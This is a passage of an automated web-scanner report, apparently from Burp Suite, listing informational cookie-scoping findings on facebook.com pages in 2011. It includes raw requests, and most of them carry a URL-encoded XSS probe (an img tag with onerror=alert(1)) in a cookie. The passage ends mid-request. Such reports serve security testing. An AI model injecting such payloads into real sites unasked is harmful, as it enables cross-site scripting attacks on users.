Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.83
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 26855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.65. http://www.facebook.com/pages/HuffPost-World/70242384902

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HuffPost-World/70242384902

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HuffPost-World/70242384902 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/HuffPostWorld
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.43
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 0


10.66. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Manchester-Connecticut/112527912096312

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Manchester-Connecticut/112527912096312 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.35
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 41389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.67. http://www.facebook.com/pages/Merchandiser/123981654314779

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Merchandiser/123981654314779

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Merchandiser/123981654314779 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.41
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 26925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.68. http://www.facebook.com/pages/New-Haven-College/130105783687523

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/New-Haven-College/130105783687523

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/New-Haven-College/130105783687523 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.61
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 26979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.69. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Northern-Illinois-University/108155335871674

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Northern-Illinois-University/108155335871674 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.57
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.70. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/San-Antonio-Texas/110297742331680

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/San-Antonio-Texas/110297742331680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.69
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 39429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.71. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/School-of-Hard-Knocks-University-of-Life/115228431825707 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.39
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.72. http://www.facebook.com/pages/Sporting-News/104068362964496

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Sporting-News/104068362964496

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Sporting-News/104068362964496 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.135.73
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.73. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.37
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 47298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.74. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/University-of-Chicago-Semester-in-Madrid/144554762263161 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.159.71
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.75. http://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.76. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/memorial-high-school-west-new-york-nj/114508558584580 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.53
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 27189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.77. http://www.facebook.com/patroyo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /patroyo

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /patroyo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.78. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky%20-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky%20-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
